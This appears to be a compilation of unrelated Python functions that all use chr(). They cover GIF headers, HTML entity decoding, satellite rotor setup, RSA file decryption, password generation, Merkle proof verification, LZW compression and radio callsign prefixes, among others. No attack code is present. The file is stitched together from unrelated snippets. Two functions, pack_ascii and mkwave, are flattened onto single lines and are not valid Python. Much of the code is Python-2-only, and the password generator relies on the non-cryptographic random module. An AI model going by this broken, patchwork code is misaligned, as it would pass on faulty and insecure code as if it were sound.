def getheader(im, info=None):
    """Return a list of strings representing a GIF header for *im*."""
    optimize = info and info.get("optimize", 0)
    width, height = im.size
    header = [
        "GIF87a"            # magic
        + o16(width)        # logical screen width
        + o16(height)       # logical screen height
        + chr(7 + 128)      # flags: 8 bits/pixel, global palette present
        + chr(0)            # background colour index
        + chr(0)            # reserved / pixel aspect ratio
    ]

    if optimize:
        # Minimize the colour palette: keep entries only up to the highest
        # colour index that actually occurs in the image histogram.
        maxcolor = 0
        for index, count in enumerate(im.histogram()):
            if count:
                maxcolor = index
    else:
        maxcolor = 256

    if im.mode == "P":
        # colour palette taken straight from the image
        header.append(im.im.getpalette("RGB")[:maxcolor * 3])
    else:
        # greyscale ramp
        for level in range(maxcolor):
            header.append(chr(level) * 3)

    return header
def deentity(data, mode=0):
    """Remove HTML entities from a string.

    Modes:
      0: Fast / common entities only (default)
      1: Comprehensive (slow)
      2: Syntax-critical escapes only
      3: Whole-file mode (skip syntax-critical escapes)
    """
    # The level of overhead which results from inefficiencies in this function
    # is phenomenal.
    # TODO: convert this entire function to do it properly, or at least use a
    # compiled regex.
    from html.entities import name2codepoint

    if mode == 0:
        foci = ('lt', 'gt', 'quot', 'nbsp', 'lsquo', 'rsquo', 'ldquo', 'rdquo',
                'ndash', 'hellip', 'eacute')
    elif mode in (1, 3):
        foci = list(name2codepoint.keys())
    elif mode == 2:
        foci = ('lt', 'gt')

    for name in foci:
        # 'amp' must be handled LAST (below) so that already-escaped sequences
        # such as "&amp;lt;" decode to the literal "&lt;" rather than "<".
        if name != "amp":
            # Whole-file mode keeps the syntax-critical lt/gt escapes intact.
            if (mode != 3) or (name not in ('lt', 'gt')):
                data = data.replace("&" + name + ";", chr(name2codepoint[name]))

    if mode in (0, 2):
        # Numeric apostrophe entity (the previous code had a no-op
        # replace("'", chr(39)) — the "&#39;" had been entity-mangled away).
        data = data.replace("&#39;", chr(39))
    elif mode in (1, ):  # 3):
        # Comprehensive mode: decode all Latin-1 numeric character references.
        for number in range(0x100):
            name = "#" + str(number)
            data = data.replace("&" + name + ";", chr(number))

    if mode != 3:
        # Ampersand last, see above (was a no-op replace("&", "&") — the
        # "&amp;" had been entity-mangled away).
        data = data.replace("&amp;", "&")
    return data
def intlist_to_bytes(xs):
    """Convert a list of integers (0-255) into a byte string.

    Works on both Python 2 (where chr() yields byte strings) and Python 3.
    """
    if not xs:
        return b''
    if isinstance(chr(0), bytes):
        # Python 2: build the byte string by joining one-byte chr() results.
        return ''.join(map(chr, xs))
    # Python 3: bytes() accepts an iterable of ints directly.
    return bytes(xs)
def createPositionerSetup(self, list):
    """Append the rotor/positioner configuration entries for this tuner
    to `list` (a config-list consumed by the setup screen).

    Reads settings from self.nimConfig; stores some entries on self so the
    screen can react to value changes (power measurement, turning speed).
    """
    nim = self.nimConfig
    list.append(getConfigListEntry(_("Longitude"), nim.longitude))
    list.append(getConfigListEntry(" ", nim.longitudeOrientation))
    list.append(getConfigListEntry(_("Latitude"), nim.latitude))
    list.append(getConfigListEntry(" ", nim.latitudeOrientation))
    if SystemInfo["CanMeasureFrontendInputPower"]:
        self.advancedPowerMeasurement = getConfigListEntry(_("Use power measurement"), nim.powerMeasurement)
        list.append(self.advancedPowerMeasurement)
        if nim.powerMeasurement.getValue():
            list.append(getConfigListEntry(_("Power threshold in mA"), nim.powerThreshold))
            self.turningSpeed = getConfigListEntry(_("Rotor turning speed"), nim.turningSpeed)
            list.append(self.turningSpeed)
            if nim.turningSpeed.getValue() == "fast epoch":
                self.turnFastEpochBegin = getConfigListEntry(_("Begin time"), nim.fastTurningBegin)
                self.turnFastEpochEnd = getConfigListEntry(_("End time"), nim.fastTurningEnd)
                list.append(self.turnFastEpochBegin)
                list.append(self.turnFastEpochEnd)
    else:
        # Frontend cannot measure input power: force the option off.
        if nim.powerMeasurement.getValue():
            nim.powerMeasurement.setValue(False)
            nim.powerMeasurement.save()
    # chr(176) is the degree sign.
    list.append(getConfigListEntry(_("Tuning step size") + " [" + chr(176) + "]", nim.tuningstepsize))
    list.append(getConfigListEntry(_("Memory positions"), nim.rotorPositions))
    list.append(getConfigListEntry(_("Horizontal turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedH))
    list.append(getConfigListEntry(_("Vertical turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedV))
def __decrypt_file(self, private_d, public_n, keys, path_to_file, CRT, k):
    """Decrypt an RSA-encrypted text file.

    The ciphertext is a sequence of fixed-width, zero-padded decimal chunks
    (each len(str(public_n)) characters wide). Each chunk decrypts to one
    character code. When CRT is true the chunks are decrypted in parallel by
    a pool of `k` workers (via self.compute_part_of_message) and re-ordered
    by chunk index afterwards; otherwise they are decrypted sequentially via
    self.__decrypt_message.

    Writes the plaintext to `path_to_file + '.dec'` and returns it.
    """
    if CRT:
        pool = Pool(processes = k)
        promises = []
    decrpted_data = ''
    with open(path_to_file, 'r') as f:
        encrypted_data = f.read()
    # Split into equal chunks of len(str(public_n)) characters; any trailing
    # partial chunk is silently dropped by the zip(*[iter(...)]*n) idiom.
    encrypted_data_chunks = list(map(''.join, zip(*[iter(encrypted_data)]*len(str(public_n)))))
    for i in range(len(encrypted_data_chunks)):
        # Remove the zero padding before treating the chunk as a number.
        stripped = encrypted_data_chunks[i].lstrip('0')
        if CRT:
            # The chunk index i travels with the job so results can be
            # re-ordered after the pool finishes.
            promise = pool.apply_async(self.compute_part_of_message, args=(stripped, keys, i))
            promises.append(promise)
        else:
            decrpted_data += chr(self.__decrypt_message(stripped, private_d, public_n))
    if CRT:
        results = [promise.get() for promise in promises]
        # Each result is (charcode, chunk_index); restore original order.
        decrypted_sorted = sorted(results, key = lambda x: x[1])
        for data in decrypted_sorted:
            decrpted_data += chr(data[0])
    if CRT:
        pool.close()
    with open(path_to_file + '.dec', 'w') as f:
        f.write(decrpted_data)
    return decrpted_data
def random_password(bit=12):
    """Generate a random password of length `bit` containing digits,
    lowercase letters, uppercase letters and special characters.

    NOTE: uses the `random` module, which is not cryptographically secure;
    use `secrets` for anything security-sensitive.
    """
    numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
    small_letters = [chr(i) for i in range(97, 123)]   # a-z
    cap_letters = [chr(i) for i in range(65, 91)]      # A-Z
    special = ['@', '#', '$', '%', '^', '&', '*', '-']
    passwd = []
    # '//' keeps the count an int on Python 3 ('bit / 4' is a float there,
    # which range() rejects with a TypeError); identical on Python 2.
    for i in range(bit // 4):
        passwd.append(random.choice(numbers))
        passwd.append(random.choice(small_letters))
        passwd.append(random.choice(cap_letters))
        passwd.append(random.choice(special))
    # For the remainder, over-generate one group per missing character and
    # truncate to the requested length below.
    for i in range(bit % 4):
        passwd.append(random.choice(numbers))
        passwd.append(random.choice(small_letters))
        passwd.append(random.choice(cap_letters))
        passwd.append(random.choice(special))
    passwd = passwd[:bit]
    random.shuffle(passwd)
    return ''.join(passwd)
def main(stdscr):
    """Curses demo: move an '@' along row 3 with h/l, quit with q."""
    stdscr.addstr(0, 2, "Curses example: h)left, l)right, q)uit")
    horzPosition = 19
    delta = 0  # current movement per frame: -1, 0 or +1
    while True:
        stdscr.refresh()
        # Non-blocking mode so getch() polls instead of waiting.
        stdscr.nodelay(1)
        while True:
            a_char_code = stdscr.getch()
            if a_char_code != -1:   # -1 means "no key pressed yet"
                break
        # Erase the marker at its old position, then clamp the new position
        # to the 0..39 column range and redraw.
        stdscr.addstr(3, horzPosition, " ")
        horzPosition += delta
        if horzPosition < 0:
            horzPosition = 0
        elif horzPosition > 39:
            horzPosition = 39
        stdscr.addstr(3, horzPosition, '@')
        stdscr.refresh()
        time.sleep(0.02)
        stdscr.nodelay(0)
        if chr(a_char_code) == "q":
            break
        elif chr(a_char_code) == "h":
            delta = -1
        elif chr(a_char_code) == "l":
            delta = +1
def report_data(self):
    """Build one Wiimote HID input report.

    Returns the string 0xA1 + report id + mode-specific payload, or 0 when
    the current report mode is unsupported.
    """
    if self.report_mode == 0x30:
        payload = self.buttons_pack()
    elif self.report_mode == 0x31:
        payload = self.buttons_pack() + self.accel_pack()
    elif self.report_mode == 0x32:
        payload = self.buttons_pack() + self.ext8_pack()
    elif self.report_mode == 0x33:
        payload = self.buttons_pack() + self.accel_pack() + self.ir12_pack()
    elif self.report_mode == 0x34:
        payload = self.buttons_pack() + self.ext19_pack()
    elif self.report_mode == 0x35:
        payload = self.buttons_pack() + self.accel_pack() + self.ext16_pack()
    elif self.report_mode == 0x36:
        payload = self.buttons_pack() + self.ir10_pack() + self.ext9_pack()
    elif self.report_mode == 0x37:
        payload = self.buttons_pack() + self.accel_pack() + self.ir10_pack() + self.ext6_pack()
    elif self.report_mode == 0x3d:
        payload = self.ext21_pack()
    elif self.report_mode == 0x3e or self.report_mode == 0x3f:
        # Interleaved reports are not implemented; previously this fell
        # through to the final return with `payload` unbound (NameError).
        # Behave like the other unsupported modes instead.
        print("*** TODO: report_mode " + hex(self.report_mode))
        return 0
    else:
        # str() here — the old "+ self.report_mode" raised TypeError when
        # concatenating a non-string, masking the real problem.
        print("*** Unhandled report mode: " + str(self.report_mode))
        return 0
    return chr(0xA1) + chr(self.report_mode) + payload
def __init__(self, fp):
    # Parse a GIMP palette file from the open file object `fp`.
    # NOTE: Python-2-only code ("raise E, msg" syntax, list-returning map,
    # the `string` module functions).
    # Start with a greyscale ramp; entries are overwritten as parsed.
    self.palette = map(lambda i: chr(i)*3, range(256))
    if fp.readline()[:12] != "GIMP Palette":
        raise SyntaxError, "not a GIMP palette file"
    i = 0
    while i <= 255:
        s = fp.readline()
        if not s:
            break
        # skip fields and comment lines (these do not consume a palette slot)
        if re.match("\w+:|#", s):
            continue
        if len(s) > 100:
            raise SyntaxError, "bad palette file"
        # First three whitespace-separated fields are the R, G, B values.
        v = tuple(map(int, string.split(s)[:3]))
        if len(v) != 3:
            raise ValueError, "bad palette entry"
        if 0 <= i <= 255:
            self.palette[i] = chr(v[0]) + chr(v[1]) + chr(v[2])
        i = i + 1
    # Flatten to a single 768-byte RGB string.
    self.palette = string.join(self.palette, "")
def createPositionerSetup(self, list):
    """Append the rotor/positioner configuration entries for this tuner
    to `list`, plus an expandable "Extra motor options" section.

    NOTE(review): the body appends to both the `list` parameter and
    `self.list` — presumably they are the same object at the call site;
    verify against the caller.
    """
    nim = self.nimConfig
    list.append(getConfigListEntry(_("Longitude"), nim.longitude))
    list.append(getConfigListEntry(" ", nim.longitudeOrientation))
    list.append(getConfigListEntry(_("Latitude"), nim.latitude))
    list.append(getConfigListEntry(" ", nim.latitudeOrientation))
    if SystemInfo["CanMeasureFrontendInputPower"]:
        self.advancedPowerMeasurement = getConfigListEntry(_("Use power measurement"), nim.powerMeasurement)
        list.append(self.advancedPowerMeasurement)
        if nim.powerMeasurement.value:
            list.append(getConfigListEntry(_("Power threshold in mA"), nim.powerThreshold))
            self.turningSpeed = getConfigListEntry(_("Rotor turning speed"), nim.turningSpeed)
            list.append(self.turningSpeed)
            if nim.turningSpeed.value == "fast epoch":
                self.turnFastEpochBegin = getConfigListEntry(_("Begin time"), nim.fastTurningBegin)
                self.turnFastEpochEnd = getConfigListEntry(_("End time"), nim.fastTurningEnd)
                list.append(self.turnFastEpochBegin)
                list.append(self.turnFastEpochEnd)
    else:
        # Frontend cannot measure input power: force the option off.
        if nim.powerMeasurement.value:
            nim.powerMeasurement.value = False
            nim.powerMeasurement.save()
    # Lazily create the yes/no toggle that reveals the extra motor options.
    if not hasattr(self, 'additionalMotorOptions'):
        self.additionalMotorOptions = ConfigYesNo(False)
    self.showAdditionalMotorOptions = getConfigListEntry(_("Extra motor options"), self.additionalMotorOptions)
    self.list.append(self.showAdditionalMotorOptions)
    if self.additionalMotorOptions.value:
        # chr(176) is the degree sign.
        self.list.append(getConfigListEntry(" " + _("Horizontal turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedH))
        self.list.append(getConfigListEntry(" " + _("Vertical turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedV))
        self.list.append(getConfigListEntry(" " + _("Turning step size") + " [" + chr(176) + "]", nim.tuningstepsize))
        self.list.append(getConfigListEntry(" " + _("Max memory positions"), nim.rotorPositions))
def requestDataBlock(self, block):
    """Request data block `block` from the device over the serial link.

    Protocol: every byte written is answered by an echo byte followed by its
    complement byte; both are read and discarded here. The sequence is:
    0x04 (attention), packet counter, 0x29 (group-read command), the block
    id, then 0x03 (end). Assumes the wire format is Python-2 byte strings.
    """
    # 8-bit rolling packet counter with manual wrap-around.
    if self.packetCounter == 0xFF:
        self.packetCounter = 0
    else:
        self.packetCounter += 1
    self.ser.write("\x04")
    packet = self.ser.read(1)
    packet = self.ser.read(1)   # this is the 0x04 complement
    self.ser.write(chr(self.packetCounter))
    packet = self.ser.read(1)
    packet = self.ser.read(1)   # this is the complement of self.packetCounter
    self.ser.write("\x29")      # this is the command for a grp reading
    packet = self.ser.read(1)
    packet = self.ser.read(1)   # this is the complement of 0x29
    # now send the grp ID number --
    self.ser.write(chr(block))
    packet = self.ser.read(1)
    packet = self.ser.read(1)   # should be complement - yet again
    self.ser.write("\x03")
    packet = self.ser.read(1)
def packed_attributes (self,addpath):
    """Yield packed MP_REACH_NLRI attributes, grouping this update's NLRIs
    by (AFI, SAFI) and next-hop. Python-2-only (iteritems, chr-as-byte).
    """
    if not self.nlris:
        return
    mpnlri = {}
    for nlri in self.nlris:
        if nlri.nexthop:
            # .packed and not .pack()
            # we do not want a next_hop attribute packed (with the
            # _attribute()) but just the next_hop bytes themselves
            if nlri.safi.has_rd():
                # Route-distinguisher SAFIs prefix the next-hop with an
                # 8-byte zero RD.
                nexthop = chr(0)*8 + nlri.nexthop.packed
            else:
                nexthop = nlri.nexthop.packed
        else:
            # EOR does not, and Flow may not, have any next_hop
            nexthop = ''
        # mpnlri[afi,safi][nexthop] = [packed nlri, ...]
        mpnlri.setdefault((nlri.afi.pack(),nlri.safi.pack()),{}).setdefault(nexthop,[]).append(nlri.pack(addpath))
    for (pafi,psafi),data in mpnlri.iteritems():
        for nexthop,nlris in data.iteritems():
            # Wire layout: AFI, SAFI, next-hop length, next-hop,
            # reserved byte (0), then the packed NLRIs.
            yield self._attribute(
                pafi + psafi + chr(len(nexthop)) + nexthop + chr(0) + ''.join(nlris)
            )
def performcheck(self, expected):
    """Read the MCU's echo, line by line, until the '>' prompt appears and
    check it against `expected`. Raises on Lua errors or echo mismatch.

    NOTE(review): the condition `== expected and self.verbose` sends a
    matching line into the error branch whenever verbose is off — this
    looks like a lost nesting level (`if match: if verbose: ...`); verify
    against the project history before relying on non-verbose mode.
    """
    line = ""
    char = ""
    while char != chr(62):          # '>' — the interpreter prompt ends the answer
        char = self.read(1)
        if char == "":
            raise Exception("No proper answer from MCU")
        if char == chr(13) or char == chr(10):  # CR or LF terminates a line
            if line != "":
                line = line.strip()
                if line + "\r" == expected and self.verbose:
                    sys.stdout.write(" -> ok")
                else:
                    if line[:4] == "lua:":
                        sys.stdout.write("\r\n\r\nLua ERROR: %s" % line)
                        raise Exception("ERROR from Lua interpreter\r\n\r\n")
                    else:
                        expected = expected.split("\r")[0]
                        sys.stdout.write("\r\n\r\nERROR")
                        sys.stdout.write("\r\n send string : '%s'" % expected)
                        sys.stdout.write("\r\n expected echo : '%s'" % expected)
                        sys.stdout.write("\r\n but got answer : '%s'" % line)
                        sys.stdout.write("\r\n\r\n")
                        raise Exception("Error sending data to MCU\r\n\r\n")
                line = ""
        else:
            line += char
def sendPixel(self, r, g, b):
    """Send the next pixel's RGB triplet to the LED strip.

    Each channel is clamped to the 0-254 range (255 is reserved by the wire
    protocol). In buffered mode the three bytes are appended to self.buf;
    otherwise they are written and flushed on self.serial immediately.

    Raises RuntimeError once all [ledCount] pixels have been set.
    """
    if self.position >= self.ledCount:
        raise RuntimeError("Attempting to set pixel outside range!")

    encoded = []
    for channel in (r, g, b):
        if channel < 0:
            channel = 0
        elif channel >= 255:
            channel = 254
        encoded.append(chr(channel))
    data = "".join(encoded)

    if self.buffered:
        self.buf += data
    else:
        self.serial.write(data)
        self.serial.flush()
    self.position += 1
def zen_of_python():
    """Decode the ROT13-encoded Zen of Python and show it in a buffer
    named *The Zen of Python* (mimicking `import this`).

    NOTE(review): the exact line breaks inside the literal were
    reconstructed from the standard Zen text — verify against the
    original file.
    """
    interactive()
    # The Zen of Python, ROT13-encoded (as in CPython's this.py).
    s = """Gur Mra bs Clguba, ol Gvz Crgref

Ornhgvshy vf orggre guna htyl.
Rkcyvpvg vf orggre guna vzcyvpvg.
Fvzcyr vf orggre guna pbzcyrk.
Pbzcyrk vf orggre guna pbzcyvpngrq.
Syng vf orggre guna arfgrq.
Fcnefr vf orggre guna qrafr.
Ernqnovyvgl pbhagf.
Fcrpvny pnfrf nera'g fcrpvny rabhtu gb oernx gur ehyrf.
Nygubhtu cenpgvpnyvgl orngf chevgl.
Reebef fubhyq arire cnff fvyragyl.
Hayrff rkcyvpvgyl fvyraprq.
Va gur snpr bs nzovthvgl, ershfr gur grzcgngvba gb thrff.
Gurer fubhyq or bar-- naq cersrenoyl bayl bar --boivbhf jnl gb qb vg.
Nygubhtu gung jnl znl abg or boivbhf ng svefg hayrff lbh'er Qhgpu.
Abj vf orggre guna arire.
Nygubhtu arire vf bsgra orggre guna *evtug* abj.
Vs gur vzcyrzragngvba vf uneq gb rkcynva, vg'f n onq vqrn.
Vs gur vzcyrzragngvba vf rnfl gb rkcynva, vg znl or n tbbq vqrn.
Anzrfcnprf ner bar ubaxvat terng vqrn -- yrg'f qb zber bs gubfr!"""
    # Build the ROT13 translation table for both upper- (65) and
    # lowercase (97) letters.
    d = {}
    for c in (65, 97):
        for i in range(26):
            d[chr(i+c)] = chr((i+13) % 26 + c)
    switch_to_buffer("*The Zen of Python*")
    insert("".join([d.get(c, c) for c in s]))
def OidFromAttid(prefixTable, attr):
    """Resolve an ATTRTYP value to a dotted OID string using the DRSUAPI
    prefix table, or return None when the prefix index is unknown.

    The upper 16 bits of `attr` select a prefix-table entry; the lower 16
    bits are BER-encoded and appended to the prefix, then the whole thing is
    decoded as an ASN.1 ObjectIdentifier.
    """
    # separate the ATTRTYP into two parts; '//' keeps integer semantics on
    # Python 3 (plain '/' produced a float there, breaking the comparison
    # against the integer "ndx" field), and is identical on Python 2.
    upperWord = attr // 65536
    lowerWord = attr % 65536

    # search in the prefix table to find the upperWord; if found, construct
    # the binary OID by appending the BER-encoded lowerWord to the prefix.
    binaryOID = None
    for item in prefixTable:
        if item["ndx"] == upperWord:
            binaryOID = item["prefix"]["elements"][: item["prefix"]["length"]]
            if lowerWord < 128:
                # single-byte arc
                binaryOID.append(chr(lowerWord))
            else:
                if lowerWord >= 32768:
                    lowerWord -= 32768
                # two-byte base-128 arc with the continuation bit set
                binaryOID.append(chr(((lowerWord // 128) % 128) + 128))
                binaryOID.append(chr(lowerWord % 128))
            break
    if binaryOID is None:
        return None
    # 0x06 = ASN.1 OBJECT IDENTIFIER tag, followed by length and contents.
    return str(decoder.decode("\x06" + chr(len(binaryOID)) + "".join(binaryOID), asn1Spec=univ.ObjectIdentifier())[0])
def compress(uncompressed):
    """LZW-compress a string into a list of output symbols.

    Single characters are emitted as themselves; longer dictionary entries
    are emitted as their integer codes (starting at 256).
    """
    dict_size = 256
    # range() instead of Py2-only xrange(): identical behavior on both
    # Python 2 and Python 3.
    dictionary = dict((chr(i), chr(i)) for i in range(dict_size))

    w = ""
    result = []
    for c in uncompressed:
        wc = w + c
        if wc in dictionary:
            # Keep extending the current match.
            w = wc
        else:
            # Emit the longest known prefix and register the new sequence.
            result.append(dictionary[w])
            dictionary[wc] = dict_size
            dict_size += 1
            w = c
    # Flush whatever match is still pending.
    if w:
        result.append(dictionary[w])
    return result
def __init__(self, simple = False ):
    """Build the list of European amateur-radio callsign prefixes.

    With simple=True the list is replaced by a short hand-picked subset.
    """
    # Denmark (incl. Faroe Islands and Greenland)
    self.prefixes = ['OU', 'OV', 'OW', 'OX', 'OY', 'OZ', 'XP', '5P', '5Q']
    # Norway  (NOTE(review): 'LN' appears twice in this list)
    self.prefixes += ['JW', 'JX', 'LA', 'LN', 'LB', 'LC', 'LD', 'LE', 'LF', 'LG', 'LH', 'LI', 'LJ', 'LK', 'LL', 'LM', 'LN', '3Y']
    # Sweden
    self.prefixes += ['SA', 'SB', 'SC', 'SD', 'SE', 'SF', 'SG', 'SH', 'SI', 'SJ', 'SK', 'SL', 'SM', '7S', '8S']
    # Germany: DA - DR (range end is exclusive, so 'A'..'R')
    for l in range(ord('A'),ord('S')):
        tmp = ['D' + chr(l)]
        self.prefixes += tmp
    # GB et. al  (+= 'G' appends the single-character prefix 'G')
    self.prefixes += 'G'
    for l in range(ord('A'),ord('Z')+1):
        tmp = ['2'+chr(l)]
        self.prefixes += tmp
    for l in range(ord('A'),ord('Z')+1):
        tmp = ['G'+chr(l)] + ['M' +chr( l ) ]
        self.prefixes += tmp
    self.prefixes += ['VP', 'VQ', 'VS']
    for l in range(ord('A'),ord('I')+1):
        tmp = ['P'+chr(l)]
        self.prefixes += tmp
    # Ireland ( is _not_ GB ;) )
    self.prefixes += [ 'EI', 'EJ']
    # Spain
    self.prefixes += ['AM', 'AN', 'AO']
    for l in range(ord('A'),ord('H')+1):
        tmp = ['E'+chr(l)]
        self.prefixes += tmp
    # Switzerland ( and Liechtenstein )
    self.prefixes += ['HB', 'HE']
    # Poland
    self.prefixes += ['3Z', 'HF']
    for l in range(ord('N'),ord('R')+1):
        tmp = ['S'+chr(l)]
        self.prefixes += tmp
    # France (better remember them or they will get mad)
    self.prefixes += ['F', 'FU', 'FV', 'HW', 'HX', 'HY', 'TH', 'TQ' ]
    for l in range(ord('V'),ord('X')+1):
        tmp = ['T'+chr(l)]
        self.prefixes += tmp
    # This is for Belgium
    for l in range(ord('N'),ord('T')+1):
        tmp = ['O'+chr(l)]
        self.prefixes += tmp
    # Czechoslovakia (yes, now two different countries)
    for l in range(ord('K'),ord('M')+1):
        tmp = ['O'+chr(l)]
        self.prefixes += tmp
    # Italy (can't figure out their system, so these are the ones that get picked)
    self.prefixes += ['I', 'IK','IA']
    if ( simple == True ):
        # Simple mode: one representative prefix per country.
        self.prefixes = ['OZ','LA','SM','G','GM', 'DA', 'DB', 'DC', 'DD','DJ','DK','OY', 'OX', 'F', 'I', 'HB', 'SP', 'EA', 'EI', 'ON', 'OK', 'OM']
def main():
    """Write the MurphyTalk phrase data file and its pinyin index file.

    Python-2-only code (`keys.sort()` on the list returned by dict.keys()).
    Index line format: "<pinyin>\t<count>\t<offset> <offset> ...".
    """
    phrases_map={}
    build_phrase_map(phrases_map)
    fPhrase=codecs.open("murphytalk_phrase.dat","wt","utf-8")
    fPhrase.write("MurphyTalk Phrase Table\nVer 0.03\n");
    fIndex=open("murphytalk_phrase_idx.txt","wt")
    fIndex.write("MurphyTalk Pinyin Phrase Index Table\nVer 0.03\n");
    keys=phrases_map.keys()
    # Placeholder frequency: uint32 zero (4 raw bytes).
    freq=chr(0)+chr(0)+chr(0)+chr(0)
    keys.sort()
    for k in keys:
        fIndex.write(k);
        fIndex.write("\t%d\t"%len(phrases_map[k]));
        for phrase in phrases_map[k]:
            # record offset in phrase file into index file
            fIndex.write("%d "%fPhrase.tell())
            # write frequency into phrase file (uint32, 4 bytes);
            # we don't use the codec but its underlying file stream here
            fPhrase.stream.write(freq)
            # write phrase text into phrase file
            fPhrase.write("%s "%phrase)
        fIndex.write("\n");
    fIndex.close()
    fPhrase.close()
def pack_ascii(text): i = 0 retstr = "" while(i+4 <= len(text)): ret = [0,0,0] ret[0] = (ord(text[i]) << 2) & 252 ret[0] = ret[0] | (((ord(text[i+1]) << 2) & 192) >> 6 ) ret[1] = (ord(text[i+1]) << 4) & 240 ret[1] = ret[1] | (((ord(text[i+2]) << 2) & 240) >> 4) ret[2] = ((ord(text[i+2]) << 6) & 192) | (ord(text[i+3]) & 0x3F) i = i + 4 retstr = retstr + chr(ret[0]) + chr(ret[1]) + chr(ret[2]) #if(i < len(text)): # ret = ret + "\x00" while(i < len(text)): retstr = retstr + text[i] i = i + 1 return retstr
def cross_check_consistency_against_opensource_algorithm(first, second, first_hash, second_hash, consistency):
    """Verify an RFC 6962-style Merkle consistency proof between a tree of
    size `first` (root `first_hash`) and a tree of size `second` (root
    `second_hash`). `consistency` is the list of proof hashes (bytes).

    Returns True only when the proof reproduces both roots exactly and has
    no leftover or missing elements.
    """
    try:
        node = first - 1
        last_node = second - 1
        # Drop common trailing 1-bits: levels where the old tree's final
        # node is a right child in both trees.
        while node & 1:
            node >>= 1
            last_node >>= 1
        p = iter(consistency)
        if node:
            # next(p): portable Py2.6+/Py3 spelling of the Py2-only p.next()
            old_hash = next(p)
        else:
            # old tree size was an exact power of two: its root is reused
            old_hash = first_hash
        new_hash = old_hash
        while node:
            if node & 1:
                # b"\x01" is the interior-node hash prefix; identical to the
                # old chr(1) on Python 2 and bytes-correct on Python 3.
                x = next(p)
                old_hash = sha256(b"\x01" + x + old_hash).digest()
                new_hash = sha256(b"\x01" + x + new_hash).digest()
            elif node < last_node:
                new_hash = sha256(b"\x01" + new_hash + next(p)).digest()
            node >>= 1
            last_node >>= 1
        while last_node:
            new_hash = sha256(b"\x01" + new_hash + next(p)).digest()
            last_node >>= 1
        for remaining in p:
            return False  # we shouldn't have any elements left over
        return old_hash == first_hash and new_hash == second_hash
    except StopIteration:
        return False      # ran out of elements
def cross_check_inclusion_via_opensource(hash, leaf_index, audit_path, tree_size, root_hash):
    """Verify an RFC 6962-style Merkle inclusion (audit) proof.

    `hash` is the leaf hash at `leaf_index`, `audit_path` the sibling hashes
    from leaf level upward (all bytes). Returns True only when the path
    reproduces `root_hash` exactly and is fully consumed.
    """
    audit_path = audit_path[:]   # do not mutate the caller's list
    node_index = leaf_index
    calculated_hash = hash
    last_node = tree_size - 1
    while last_node > 0:
        if not audit_path:
            return False
        if node_index % 2:
            # Right child: sibling goes on the left.
            # b"\x01" is the interior-node prefix; identical to chr(1) on
            # Python 2 and bytes-correct on Python 3.
            audit_hash = audit_path.pop(0)
            calculated_hash = sha256(b"\x01" + audit_hash + calculated_hash).digest()
        elif node_index < last_node:
            # Left child with an existing sibling on the right.
            audit_hash = audit_path.pop(0)
            calculated_hash = sha256(b"\x01" + calculated_hash + audit_hash).digest()
        # node_index == last_node and node_index is even: a sibling does
        # not exist. Go further up the tree until node_index is odd so
        # calculated_hash will be used as the right-hand operand.
        node_index //= 2
        last_node //= 2
    if audit_path:
        return False
    return calculated_hash == root_hash
def decode_1033(pkt):
    """Consume a type-1033 status record from the bit stream `pkt`.

    Layout: a 12-bit station id, then a length-prefixed description string,
    an 8-bit setup field, and four more length-prefixed strings (serial
    number, receiver, version, reason). All decoded values are currently
    discarded — the point is only to advance the stream.
    """
    stat_id = pkt.read(12).uint

    def read_lp_string():
        # One 8-bit length, then that many 8-bit character codes.
        count = pkt.read(8).uint
        return "".join(chr(pkt.read(8).uint) for _ in range(count))

    des = read_lp_string()
    setup = pkt.read(8).uint
    sno = read_lp_string()
    rec = read_lp_string()
    ver = read_lp_string()
    rsn = read_lp_string()
def mkwave(octave): global sinewave, nowave sinewave = '' for i in range(100): val = int(math.sin(math.pi * float(i) * octave / 50.0) * 30000) sinewave = sinewave + chr((val >> 8) & 255) + chr(val & 255) nowave = '\0' * 200
def populate(self):
    """Create (or fetch from the cache) one Texture per frame of image
    data in self._data and store them in self._textures.
    """
    self._textures = []
    fname = self.filename
    if __debug__:
        Logger.trace('Image: %r, populate to textures (%d)' % (
            fname, len(self._data)))
    for count in range(len(self._data)):
        # first, check if a texture with the same name already exists in
        # the cache. `strtype` coerces literals to the same str/unicode
        # type as the filename (this local used to be named `chr`,
        # shadowing the builtin).
        strtype = type(fname)
        uid = strtype(u'%s|%d|%d') % (fname, self._mipmap, count)
        texture = Cache.get('kv.texture', uid)
        # if not, create it and append it to the cache
        if texture is None:
            imagedata = self._data[count]
            source = '{}{}|'.format(
                'zip|' if fname.endswith('.zip') else '',
                self._nocache)
            imagedata.source = strtype(source) + uid
            texture = Texture.create_from_data(
                imagedata, mipmap=self._mipmap)
            if not self._nocache:
                Cache.append('kv.texture', uid, texture)
            if imagedata.flip_vertical:
                texture.flip_vertical()
        # set as our current texture
        self._textures.append(texture)
        # release the data if asked
        if not self.keep_data:
            self._data[count].release_data()
def hashNote(self,n):
    '''
    Encodes a note

    >>> hasher = omr.correctors.MeasureHash()
    >>> n = note.Note('C')
    >>> n.duration.type = 'quarter'
    >>> hasher.hashNote(n)
    'P'
    >>> n2 = note.Note('C')
    >>> n2.duration.type = 'half'
    >>> hasher.hashNote(n2)
    'Z'
    >>> n3 = note.Note('C', quarterLength=1.5)
    >>> hasher.hashNote(n3)
    'V'
    '''
    duration1to127 = self.hashQuarterLength(n.duration.quarterLength)
    if duration1to127 % 2 == 0 and duration1to127 > 0:
        # Even positive values map directly.
        byteEncoding = chr(duration1to127)
    elif duration1to127 % 2 == 1 and duration1to127 > 0:
        # Odd positive values round up to the next even code.
        byteEncoding = chr(duration1to127 + 1)
    else:
        # duration1to127 <= 0: previously only < 0 was handled, so a value
        # of exactly 0 raised UnboundLocalError; clamp to the minimum code.
        byteEncoding = chr(1)
    return byteEncoding
def startKinect(self):
    """Start the Kinect C++ helper program and handshake with it over a
    shared-memory map. Python-2 / Windows-only code (os.startfile, print
    statements, mmap tag names).
    """
    self.prog = os.startfile("C:\Users\Matthieu\Documents\MI12\Projet_test\Kinect_test\Release\Kinect_test.exe")
    time.sleep(2)
    # You should "open" the memory map file instead of attempting to create it..
    self.shm = mmap.mmap(0, 512, "Local\\Test")
    if self.shm:
        #self.self.shm.write(bytes("5", 'UTF-8'));
        #self.shm.write(bytes("Hello", 'UTF-8'))
        time.sleep(0.5)
